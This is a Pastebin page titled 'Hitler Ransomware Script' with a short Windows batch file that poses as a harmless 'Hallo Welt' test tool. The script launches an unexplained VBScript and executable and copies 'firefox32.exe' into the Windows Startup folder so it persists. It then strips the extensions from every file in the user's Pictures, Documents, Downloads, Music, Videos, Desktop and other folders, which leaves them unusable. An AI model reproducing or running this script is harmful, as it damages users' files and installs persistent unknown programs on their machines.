Advertisement
brendonfeeley

Hitler Ransomware Script 08016

Aug 8th, 2016
1,223
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.79 KB | None | 0 0
  1. @shift /0
  2. @echo off
  3. title ExtraTools
  4. color 1b
  5. echo Das ist ein Test
  6. echo besser gesagt ein HalloWelt
  7. echo copyright HalloWelt 2016
  8. echo :d by CoolNass
  9. echo.
  10. echo.
  11. echo Ich bin ein Pro
  12. echo fuer Tools für Windows
  13. start ErOne.vbs
  14. copy firefox32.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  15. start chrst.exe
  16. cd "C:\Users\Public\Pictures\Sample Pictures"
  17. ren *.* *.
  18. cd %userprofile%\Pictures
  19. ren *.* *.
  20. cd %userprofile%\Documents
  21. ren *.* *.
  22. cd %userprofile%\Downloads
  23. ren *.* *.
  24. cd %userprofile%\Music
  25. ren *.* *.
  26. cd "C:\Users\Public\Music\Sample Music"
  27. ren *.* *.
  28. cd %userprofile%\Videos
  29. ren *.* *.
  30. cd "C:\Users\Public\Videos\Sample Videos"
  31. ren *.* *.
  32. cd %userprofile%\Contacts
  33. ren *.* *.
  34. cd %userprofile%\Links
  35. ren *.* *.
  36. cd %userprofile%\Desktop
  37. ren *.* *.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement